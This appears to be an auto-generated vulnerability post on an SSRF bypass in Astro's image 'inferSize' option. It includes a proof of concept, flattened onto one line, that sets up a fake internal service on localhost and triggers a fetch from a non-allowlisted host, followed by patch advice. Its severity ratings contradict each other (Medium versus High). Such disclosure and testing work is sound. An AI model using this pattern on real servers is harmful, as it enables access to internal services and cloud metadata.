Listen to this Post
A bug in Astro’s image pipeline, affecting versions 9.0.0 through 9.5.3, allows attackers to bypass `image.domains` and `image.remotePatterns` restrictions. This vulnerability resides in the `inferSize` option, which fetches remote images at render time to determine their dimensions. When this option is used, the framework fails to perform domain validation, fetching images from any host regardless of configured allowlists. An attacker who can influence image URLs (e.g., via CMS content or user-supplied data) can exploit this to make the server fetch content from unauthorized hosts. This leads to Server-Side Request Forgery (SSRF), enabling requests to internal network services and cloud metadata endpoints. The issue is fixed in version 9.5.4 .
dailycve form:
Platform: Astro Web Framework
Version: 9.0.0-9.5.3
Vulnerability: SSRF Bypass
Severity: Medium (6.5)
date: 02/25/2026
Prediction: March 2026 Patch
What Undercode Say:
Showing bash commands and codes related to the blog
Setup for Proof of Concept Create a new Astro project with the vulnerable configuration 1. Create project directory and initialize mkdir poc-ssrf-infersize cd poc-ssrf-infersize npm init -y 2. Install vulnerable versions npm install [email protected] @astrojs/[email protected] 3. Create astro.config.mjs with allowlist for localhost:9000 only File: astro.config.mjs cat > astro.config.mjs << 'EOF' import { defineConfig } from 'astro/config'; import node from '@astrojs/node'; export default defineConfig({ output: 'server', adapter: node({ mode: 'standalone' }), image: { remotePatterns: [ { hostname: 'localhost', port: '9000' } ] } }); EOF 4. Create a simulated internal service (non-allowlisted) File: internal-service.mjs cat > internal-service.mjs << 'EOF' import { createServer } from 'node:http'; const GIF = Buffer.from('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==', 'base64'); createServer((req, res) => { console.log(<code>[bash] Received: ${req.method} ${req.url}</code>); res.writeHead(200, { 'Content-Type': 'image/gif', 'Content-Length': GIF.length }); res.end(GIF); }).listen(8888, '127.0.0.1', () => console.log('Internal service on 127.0.0.1:8888')); EOF 5. Create a page that triggers the vulnerability File: src/pages/test.astro mkdir -p src/pages cat > src/pages/test.astro << 'EOF' import { getImage } from 'astro:assets'; const result = await getImage({ src: 'http://127.0.0.1:8888/internal-api', inferSize: true }); <html> <body> Width: {result.options.width}, Height: {result.options.height} </body> </html> EOF 6. Run the internal service node internal-service.mjs & 7. Start the Astro dev server npm run dev
Exploit:
Trigger the SSRF by requesting the page curl http://localhost:4322/test The internal service logs will show: [bash] Received: GET /internal-api This confirms the server fetched from a non-allowlisted host (127.0.0.1:8888)
Protection from this CVE
Upgrade to Astro version 9.5.4 or later. As an immediate workaround, avoid using the `inferSize` option with user-supplied image URLs. Validate and sanitize all image URL inputs, and implement network-level controls to restrict outbound traffic from the server .
Impact
High. Successful exploitation allows Server-Side Request Forgery (SSRF), enabling attackers to bypass security controls and interact with internal network services and cloud metadata endpoints. This can lead to information disclosure, internal network scanning, and potential further compromise of internal systems .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

